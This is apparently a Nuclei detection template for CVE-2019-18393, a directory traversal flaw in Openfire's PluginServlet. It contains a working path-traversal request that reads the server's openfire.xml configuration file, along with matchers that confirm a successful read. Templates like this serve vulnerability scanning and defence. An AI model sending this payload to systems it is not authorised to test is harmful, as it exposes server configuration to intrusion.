id: CVE-2019-18393 info: name: Openfire LFI author: pikpikcu severity: medium description: PluginServlet.java in Ignite Realtime Openfire through 4.4.2 does not ensure that retrieved files are located under the Openfire home directory, aka a directory traversal vulnerability. reference: https://swarm.ptsecurity.com/openfire-admin-console/ tags: cve,cve2019,openfire,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.30 cve-id: CVE-2019-18393 cwe-id: CWE-22 requests: - method: GET path: - '{{BaseURL}}/plugins/search/..\..\..\conf\openfire.xml' matchers-condition: and matchers: - type: word words: - "org.jivesoftware.database.EmbeddedConnectionProvider" - "Most properties are stored in the Openfire database" part: body - type: status status: - 200